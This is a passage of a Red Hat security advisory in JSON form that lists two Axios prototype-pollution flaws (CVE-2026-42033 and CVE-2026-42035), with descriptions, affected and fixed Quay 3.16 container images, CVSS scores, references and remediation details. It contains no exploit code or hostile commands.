          "category": "description",
          "text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461607",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
        }
      ],
      "release_date": "2026-04-24T17:36:44.132000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-42035",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:17.109481+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461606"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461606",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
        }
      ],
      "release_date": "2026-04-24T17:38:07.752000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
